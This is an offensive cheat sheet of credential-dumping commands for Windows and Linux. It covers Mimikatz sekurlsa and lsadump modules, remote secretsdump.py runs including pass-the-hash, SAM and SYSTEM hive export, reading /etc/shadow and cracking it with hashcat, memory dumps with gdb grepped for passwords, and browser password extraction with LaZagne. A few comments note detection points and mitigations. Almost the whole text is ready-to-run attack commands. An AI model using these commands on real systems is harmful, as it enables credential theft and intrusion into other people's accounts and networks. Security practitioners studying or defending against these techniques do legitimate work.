Credential Dumping Techniques
# WINDOWS — Mimikatz (must run elevated as Administrator or SYSTEM; the sekurlsa::* modules need SeDebugPrivilege, which privilege::debug enables; LSASS handle opens from an unprotected process are the main detection point, e.g. Sysmon Event ID 10 ProcessAccess on lsass.exe)
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # Read credentials from LSASS memory (NTLM hashes; plaintext only where a provider such as WDigest caches it) — mitigated by LSA Protection (RunAsPPL) and Credential Guard
sekurlsa::wdigest # WDigest plaintext; only yields anything when WDigest credential caching is enabled, which is off by default since Windows 8.1 / Server 2012 R2
lsadump::sam # Dump SAM database
lsadump::lsa /patch # Dump LSA secrets
# WINDOWS — secretsdump.py (remote, from Linux)
python3 secretsdump.py corp.local/administrator:Admin@2024@192.168.1.10
python3 secretsdump.py -hashes :NTLM_HASH corp.local/administrator@192.168.1.10
# WINDOWS — Local SAM dump (offline hive files)
# Export the SAM and SYSTEM hives from the live system (requires Administrator); from a USB boot the same hive files can be copied directly unless the disk is encrypted (BitLocker is the mitigation):
reg save HKLM\SAM C:\temp\sam
reg save HKLM\SYSTEM C:\temp\system
# Then on Linux:
python3 secretsdump.py -sam sam -system system LOCAL
# LINUX — /etc/shadow (need root)
cat /etc/shadow
# Format: user:$6$salt$hash:... ($6$ = sha512crypt, which is hashcat mode 1800; newer Debian/Ubuntu default to $y$ yescrypt, which is not mode 1800)
# Crack: hashcat -m 1800 shadow.txt rockyou.txt
# LINUX — memory dump with gdb (attaching to another process requires CAP_SYS_PTRACE / root when kernel.yama.ptrace_scope is 1 or higher, as on Ubuntu by default; gdb's dump memory below is a gdb console command, not a shell command)
# Find process with credentials loaded in memory:
ps aux | grep "app\|node\|python"
gdb -p PID
dump memory /tmp/dump.bin 0x0 0xffffffff
strings /tmp/dump.bin | grep -i "password\|secret\|key"
# BROWSERS — extract saved passwords
# Chrome: C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data (SQLite; the stored passwords are DPAPI-encrypted under the user's logon credential)
# Firefox: C:\Users\%USER%\AppData\Roaming\Mozilla\Firefox\Profiles\
# Use: LaZagne.exe browsers